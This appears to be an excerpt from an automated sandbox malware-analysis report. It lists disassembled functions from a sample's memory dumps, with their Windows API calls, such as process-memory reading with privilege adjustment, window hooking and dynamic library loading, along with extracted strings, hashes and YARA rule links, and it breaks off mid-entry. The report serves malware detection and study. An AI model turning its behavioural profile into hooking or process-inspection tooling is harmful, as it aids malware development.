                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$Process$Virtual$AllocateCloseHandleInformationModule32OpenQueryReadSystem_memset$AdjustCreateFirstFreeNextPrivilegeSnapshotToolhelp32
                                                                                  • String ID: $2$2$Bass.dll$G$H$I$M$U$d$e$i$i$o$t$u
                                                                                  • API String ID: 736719229-977268173
                                                                                  • Opcode ID: 1172380c352def58963c863074238b151678e0b8d799e7603d366d684b2acdd0
                                                                                  • Instruction ID: c2fd78cef0189133bec5effa0d0b3256dcc01d8cb93f2810c4bf87f2bf396bdd
                                                                                  • Opcode Fuzzy Hash: 1172380c352def58963c863074238b151678e0b8d799e7603d366d684b2acdd0
                                                                                  • Instruction Fuzzy Hash: 1F417F6150C3C09DD311DB688848B9FBFD45FAA64CF080A5DF1D866292DBB9CA08C77B
                                                                                  Function 0BEF56FC Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 355fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0BEF576B
                                                                                  • MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00000000,xxxxxx,?,Index,0BEFFCE8,00000000,0BEF5C04,?,?,?,00000008,00000000), ref: 0BEF57A2
                                                                                    • Part of subcall function 0BEF4DB0: MessageBoxA.USER32(00000000,00000000,00000000,00000040), ref: 0BEF4DCA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$MappingMessageOpenView
                                                                                  • String ID: $00000000$.mem$.mtx$Index$MessageBox$readnowid.mtx$xxxxxx
                                                                                  • API String ID: 1254488582-3625701455
                                                                                  • Opcode ID: c5d9a9c897abff491e354b3bdfd92a0dfee70157a936e7f136cec4084f3c360b
                                                                                  • Instruction ID: 9a97f3c394b4e00ea8552ffa8f81786837067ecad7a2d13f3ebeca1946762bc4
                                                                                  • Opcode Fuzzy Hash: c5d9a9c897abff491e354b3bdfd92a0dfee70157a936e7f136cec4084f3c360b
                                                                                  • Instruction Fuzzy Hash: 0DD16530B1020A9FDF11EBB8E892F9E77F6EB64704F106025E601AB394CB759E498B54
                                                                                  Function 6A6F968C Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6A6F9696
                                                                                    • Part of subcall function 6A6F3FBD: __EH_prolog3.LIBCMT ref: 6A6F3FC4
                                                                                  • CallNextHookEx.USER32(?,?,?,?), ref: 6A6F96DA
                                                                                    • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
                                                                                    • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
                                                                                  • GetClassLongA.USER32(?,000000E6), ref: 6A6F971E
                                                                                  • GlobalGetAtomNameA.KERNEL32(?,?,?,?,?,?,00000005), ref: 6A6F9748
                                                                                  • SetWindowLongA.USER32(?,000000FC,Function_0002856B), ref: 6A6F979D
                                                                                  • _memset.LIBCMT ref: 6A6F97E7
                                                                                  • GetClassLongA.USER32(?,000000E0), ref: 6A6F9817
                                                                                  • GetClassNameA.USER32(?,?,00000100), ref: 6A6F9838
                                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 6A6F985C
                                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 6A6F9876
                                                                                  • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 6A6F9881
                                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 6A6F9889
                                                                                  • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 6A6F9891
                                                                                  • SetWindowLongA.USER32(?,000000FC,Function_0002953F), ref: 6A6F989F
                                                                                  • CallNextHookEx.USER32(?,00000003,?,?), ref: 6A6F98B7
                                                                                  • UnhookWindowsHookEx.USER32(?), ref: 6A6F98CB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                  • String ID: #32768$AfxOldWndProc423$ime
                                                                                  • API String ID: 1191297049-4034971020
                                                                                  • Opcode ID: 6ae707954b3723763a9b649bf649bebedeae5d9ba3a46eb8d6cacde036c340fc
                                                                                  • Instruction ID: 23a64423457102530aa9151b66bed536c8dbcc0637a89a017b591ac0fc71a8a2
                                                                                  • Opcode Fuzzy Hash: 6ae707954b3723763a9b649bf649bebedeae5d9ba3a46eb8d6cacde036c340fc
                                                                                  • Instruction Fuzzy Hash: 9461D472500216AFDB119FA5CC48B9E7BFAAF06329F010960F914E61C0DF35CE82CBA5
                                                                                  Function 0BEB7A64 Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetObjectA.GDI32(?,00000054,?), ref: 0BEB7A87
                                                                                  • GetDC.USER32(00000000), ref: 0BEB7AB5
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0BEB7AC6
                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0BEB7AE1
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB7AFB
                                                                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0BEB7B1D
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0BEB7B2B
                                                                                  • SelectObject.GDI32(?), ref: 0BEB7B73
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 0BEB7B86
                                                                                  • RealizePalette.GDI32(?), ref: 0BEB7B8F
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 0BEB7B9B
                                                                                  • RealizePalette.GDI32(?), ref: 0BEB7BA4
                                                                                  • SetBkColor.GDI32(?), ref: 0BEB7BAE
                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0BEB7BD2
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0BEB7BDC
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB7BEF
                                                                                  • DeleteObject.GDI32 ref: 0BEB7BFB
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB7C11
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB7C2C
                                                                                  • DeleteDC.GDI32(00000000), ref: 0BEB7C48
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0BEB7C59
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                                  • String ID:
                                                                                  • API String ID: 332224125-0
                                                                                  • Opcode ID: 9ef30dce628c815b92940c22dad1f9d1fca2bd8d0f4cfef9199a604ed82bb3d1
                                                                                  • Instruction ID: b076a9548b9fd19974ebbe2e85abda64c2e8cab74730418b06ee17314cdfc22d
                                                                                  • Opcode Fuzzy Hash: 9ef30dce628c815b92940c22dad1f9d1fca2bd8d0f4cfef9199a604ed82bb3d1
                                                                                  • Instruction Fuzzy Hash: 5E510971E14208AFDF10EBE8DC96FEFB7B8AB49700F105465B614E7680D6749D48CBA4
                                                                                  Function 6A6DBDF0 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 73libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: .$G$N$N$R$i$n$n$o$t$t$t$t$uNno$v
                                                                                  • API String ID: 2574300362-245161538
                                                                                  • Opcode ID: 7ca0cb654ba2dce7acc6640bbe3a1132d82660ac884432d5c28ce52688b32460
                                                                                  • Instruction ID: 1150c046f6dc65eb698efc1a571871f8ce5f1344add7b305295d1e89e3d1835c
                                                                                  • Opcode Fuzzy Hash: 7ca0cb654ba2dce7acc6640bbe3a1132d82660ac884432d5c28ce52688b32460
                                                                                  • Instruction Fuzzy Hash: CF31D11110D3C1DDE302CB79844878FBFD51BAA648F48898DF0C897282C6AAD64CC77B
                                                                                  Function 6A6F5AD7 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,75A84A40,6A6F5C2C,?,?,?,?,?,?,?,6A6F7A16,00000000,00000002,00000028), ref: 6A6F5B02
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6A6F5B1E
                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6A6F5B2F
                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6A6F5B40
                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6A6F5B51
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6A6F5B62
                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6A6F5B73
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 6A6F5B84
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                  • API String ID: 667068680-68207542
                                                                                  • Opcode ID: c825aa007aab9baa6fef84c49beac81b8348fa49b77b4ca19af87af1e8594797
                                                                                  • Instruction ID: fe17fafd1a461ddca00cac73298b51fa9683420a14fd67c374f6c86fe5b66eeb
                                                                                  • Opcode Fuzzy Hash: c825aa007aab9baa6fef84c49beac81b8348fa49b77b4ca19af87af1e8594797
                                                                                  • Instruction Fuzzy Hash: 21214AB19101999FDF109FB58DE4D29BEF9AA4B2043994C3FEA02E3100DB305D468F11
                                                                                  Function 0BEF4FE4 Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 319COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateSemaphoreA.KERNEL32(00000000,?,?,00000000), ref: 0BEF50F0
                                                                                    • Part of subcall function 0BE97260: CreateMutexA.KERNEL32(?,?,?,?,0BEF5193,00000000,00000000,00000000,.mtx,?,xxxxxx,?,Index,0BEFFCE8,00000000,0BEF545C), ref: 0BE97276
                                                                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002000,00000000), ref: 0BEF5242
                                                                                    • Part of subcall function 0BEF4DB0: MessageBoxA.USER32(00000000,00000000,00000000,00000040), ref: 0BEF4DCA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create$FileMappingMessageMutexSemaphore
                                                                                  • String ID: $00000000$.mem$.mtx$@none$File$Index$MessageBox$Mutx$xxxxxx
                                                                                  • API String ID: 2259750652-816945559
                                                                                  • Opcode ID: e93da5820fc59886879878571806257741d9e3023fe84ea14ae00eaa5e75325a
                                                                                  • Instruction ID: b1a14bcdbc09341b63a3f2cee9248151ac8fb47484bc2d67f97e2bd3309b60bb
                                                                                  • Opcode Fuzzy Hash: e93da5820fc59886879878571806257741d9e3023fe84ea14ae00eaa5e75325a
                                                                                  • Instruction Fuzzy Hash: 8FC1A570B1020E9FDF10EBA4E842B9D77F6EF64715F106024E601AB394DB75EE0A9B64
                                                                                  Function 6A6F7926 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6FA9DA: GetWindowLongA.USER32(?,000000F0), ref: 6A6FA9E5
                                                                                  • GetParent.USER32(?), ref: 6A6F7955
                                                                                  • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 6A6F7978
                                                                                  • GetWindowRect.USER32(?,?), ref: 6A6F7992
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 6A6F79A8
                                                                                  • CopyRect.USER32(?,?), ref: 6A6F79F5
                                                                                  • CopyRect.USER32(?,?), ref: 6A6F79FF
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 6A6F7A08
                                                                                  • CopyRect.USER32(?,?), ref: 6A6F7A24
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                  • String ID: (
                                                                                  • API String ID: 808654186-3887548279
                                                                                  • Opcode ID: f8e6dd5f47000b6d001453544eaa8031853b7e64cad323c30f2cb569956abd12
                                                                                  • Instruction ID: 00e2f17242a11c48804ba38f24e9712fb217a8d0ebe7f8532eb8e72e54f1b25b
                                                                                  • Opcode Fuzzy Hash: f8e6dd5f47000b6d001453544eaa8031853b7e64cad323c30f2cb569956abd12
                                                                                  • Instruction Fuzzy Hash: DD513172900119AFDB01CFA9CD85EEEBBBAEF48314F164525E915F7141DB30ED428B64
                                                                                  Function 6A6E4E64 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 252networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • recv.WS2_32(?,?,00000001,00000000), ref: 6A6E4E17
                                                                                  • _strncmp.LIBCMT ref: 6A6E4E83
                                                                                  • _swscanf.LIBCMT ref: 6A6E4ECC
                                                                                    • Part of subcall function 6A7000D8: _vscan_fn.LIBCMT ref: 6A7000EF
                                                                                  • _memset.LIBCMT ref: 6A6E4FAA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
